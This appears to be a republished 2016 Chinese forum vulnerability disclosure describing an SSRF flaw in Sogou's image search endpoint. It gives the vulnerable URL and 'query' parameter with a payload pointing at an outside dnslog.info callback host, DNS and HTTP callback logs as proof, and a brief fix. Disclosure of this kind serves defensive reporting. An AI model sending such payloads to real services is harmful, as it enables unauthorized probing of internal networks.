HanDs
管理员

[7月漏洞公开] 搜狗搜索某处SSRF漏洞 



搜狗搜索某处SSRF漏洞

详细说明:

# 服务器

http://pic.sogou.com

# 位置

http://pic.sogou.com/ris

# 参数 query

http://pic.sogou.com/ris?query=http://ssrf.sogou.99fd5e.dnslog.info/hello.jpg&er=3&flag=1

漏洞证明:

CloudEye回显

code 区域
[24/May/2016:12:05:36 +0800] 123.126.50.104 - - ssrf.sogou.99fd5e.dnslog.info GET /hello.jpg HTTP/1.1 404 "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30" "-"



code 区域
24-May-2016 12:05:36.392 queries: client 208.69.37.21#61645 (ssrf.sogou.99fd5e.dnslog.info): query: ssrf.sogou.99fd5e.dnslog.info IN A -E (128.199.200.236)

修复方案:

架构设计,只允许访问互联网的隔离机器


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
搜狗 搜索 某处 S SR F 漏洞
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复